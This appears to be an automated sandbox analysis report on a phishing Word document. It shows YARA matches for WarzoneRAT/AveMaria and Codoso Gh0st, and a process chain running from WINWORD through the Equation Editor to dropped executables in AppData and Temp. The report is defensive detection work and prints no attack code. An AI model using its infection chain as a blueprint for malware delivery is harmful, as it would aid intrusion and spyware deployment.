          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 7.3.efwhixxln.exe.5f6450.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 7.3.efwhixxln.exe.5f4be0.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.3.efwhixxln.exe.5fb358.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5fb358.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 7.2.efwhixxln.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.3.efwhixxln.exe.5fb358.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5fb358.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f4be0.2.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 6.2.efwhixxln.exe.310000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 6.2.efwhixxln.exe.324a70.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 6.2.efwhixxln.exe.324a70.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 7.3.efwhixxln.exe.5f6450.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.efwhixxln.exe.418070.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.418070.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 7.2.efwhixxln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000007.00000003.923433855.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
          Source: 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_00403640
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: String function: 00402EC0 appears 54 times
          Source: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exeCode function: String function: 004061C5 appears 34 times
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: String function: 0040E579 appears 47 times
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: String function: 004033AB appears 35 times
          Source: RFQ-BT5004423.LNK.0.drLNK file: ..\..\..\..\..\Desktop\RFQ-BT5004423.doc
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Q-BT5004423.docJump to behavior
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@11/13@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040B5E1 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0040B5E1
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeCode function: 7_2_0040D450 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,7_2_0040D450
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: RFQ-BT5004423.docReversingLabs: Detection: 28%
          Source: RFQ-BT5004423.docVirustotal: Detection: 23%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\efwhixxln.exe "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeProcess created: C:\Users\user\AppData\Local\Temp\efwhixxln.exe C:\Users\user\AppData\Local\Temp\efwhixxln.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe "C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe" "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe "C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe" "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Users\user\AppData\Local\Temp\efwhixxln.exe "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dlJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\efwhixxln.exeProcess created: C:\Users\user\AppData\Local\Temp\efwhixxln.exe C:\Users\user\AppData\Local\Temp\efwhixxln.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
